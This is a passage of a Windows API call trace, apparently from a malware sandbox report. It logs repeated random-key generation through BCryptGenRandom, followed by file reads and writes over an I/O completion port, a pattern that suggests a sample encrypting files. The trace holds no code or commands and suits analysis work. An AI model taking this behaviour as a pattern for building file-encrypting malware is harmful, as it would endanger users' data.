0x3e305b8 [0196.061] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.061] free (_Block=0x3e305b8) [0196.061] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.061] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.061] free (_Block=0x1fa91d0) [0196.061] free (_Block=0x1fa2ed8) [0196.061] free (_Block=0x1fa90b8) [0196.061] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.062] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.066] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.066] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.077] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.078] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.078] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0196.078] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.079] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.079] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0196.079] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.079] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.079] free (_Block=0x3e305b8) [0196.079] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.079] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.079] free (_Block=0x1fa91d0) [0196.079] free (_Block=0x1fa2ed8) [0196.079] free (_Block=0x1fa90b8) [0196.080] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0196.080] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.090] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.091] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.091] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0196.091] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.091] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.091] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0196.092] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.092] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.092] free (_Block=0x3e305b8) [0196.092] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.092] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.092] free (_Block=0x1fa91d0) [0196.092] free (_Block=0x1fa2ed8) [0196.092] free (_Block=0x1fa90b8) [0196.092] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0196.094] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.108] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.108] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0196.109] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.109] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0196.109] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.109] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.109] free (_Block=0x3e305b8) [0196.109] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.109] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.110] free (_Block=0x1fa91d0) [0196.110] free (_Block=0x1fa2ed8) [0196.110] free (_Block=0x1fa90b8) [0196.110] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.112] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.125] CloseHandle (hObject=0x308) returned 1 [0196.125] free (_Block=0x3d70450) [0196.125] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.130] CloseHandle (hObject=0x170) returned 1 [0196.130] free (_Block=0x3df0008) [0196.130] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.140] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.141] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.141] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0196.141] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.141] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.141] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0196.142] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.142] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.142] free (_Block=0x3e305b8) [0196.142] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.142] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.142] free (_Block=0x1fa91d0) [0196.142] free (_Block=0x1fa2ed8) [0196.142] free (_Block=0x1fa90b8) [0196.142] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0196.144] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.202] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.202] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.202] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0196.202] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.203] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.203] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0196.203] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.203] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.203] free (_Block=0x3e305b8) [0196.203] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.203] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.204] free (_Block=0x1fa91d0) [0196.204] free (_Block=0x1fa2ed8) [0196.204] free (_Block=0x1fa90b8) [0196.204] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0196.206] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.214] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.215] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.215] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0196.215] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.215] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.215] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0196.215] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.216] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.216] free (_Block=0x3e305b8) [0196.216] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.216] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.216] free (_Block=0x1fa91d0) [0196.216] free (_Block=0x1fa2ed8) [0196.216] free (_Block=0x1fa90b8) [0196.216] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0196.218] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.231] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.231] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.231] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0196.231] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.232] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.232] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0196.232] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.232] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.232] free (_Block=0x3e305b8) [0196.232] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.232] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.233] free (_Block=0x1fa91d0) [0196.233] free (_Block=0x1fa2ed8) [0196.233] free (_Block=0x1fa90b8) [0196.233] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.235] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.243] CloseHandle (hObject=0x308) returned 1 [0196.243] free (_Block=0x3e70008) [0196.244] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.250] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2c690, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.251] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.268] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.269] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.269] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0196.269] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.269] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.269] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0196.269] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.269] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.269] free (_Block=0x3e305b8) [0196.269] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.270] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.270] free (_Block=0x1fa91d0) [0196.270] free (_Block=0x1fa2ed8) [0196.270] free (_Block=0x1fa90b8) [0196.270] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0196.270] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.287] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0196.297] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.307] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.307] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.307] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0196.307] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.308] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.308] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0196.308] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.308] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.308] free (_Block=0x3e305b8) [0196.308] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.308] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.309] free (_Block=0x1fa91d0) [0196.309] free (_Block=0x1fa2ed8) [0196.309] free (_Block=0x1fa90b8) [0196.309] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0196.309] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.327] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3602, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0196.338] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.351] CloseHandle (hObject=0x2a4) returned 1 [0196.351] free (_Block=0x3df0008) [0196.351] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.364] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x8880, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0196.368] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.369] CloseHandle (hObject=0x338) returned 1 [0196.369] free (_Block=0x3d70450) [0196.369] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.370] WriteFile (in: hFile=0x170, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x8310, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0196.370] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.378] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x870a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.379] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.380] CloseHandle (hObject=0x170) returned 1 [0196.381] free (_Block=0x3df0008) [0196.381] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.389] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.389] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.389] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0196.389] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.390] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.390] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0196.390] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.390] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.390] free (_Block=0x3e305b8) [0196.390] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.390] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.391] free (_Block=0x1fa91d0) [0196.391] free (_Block=0x1fa2ed8) [0196.391] free (_Block=0x1fa90b8) [0196.391] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.391] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.392] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x5ee0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.393] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.393] CloseHandle (hObject=0x170) returned 1 [0196.393] free (_Block=0x3df0008) [0196.393] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.403] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.403] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0196.403] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.404] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0196.404] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.404] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.404] free (_Block=0x3e305b8) [0196.404] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.404] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.404] free (_Block=0x1fa91d0) [0196.404] free (_Block=0x1fa2ed8) [0196.404] free (_Block=0x1fa90b8) [0196.404] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.405] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.406] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xa810, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.406] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0196.407] CloseHandle (hObject=0x170) returned 1 [0196.407] free (_Block=0x3df0008) [0196.407] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, 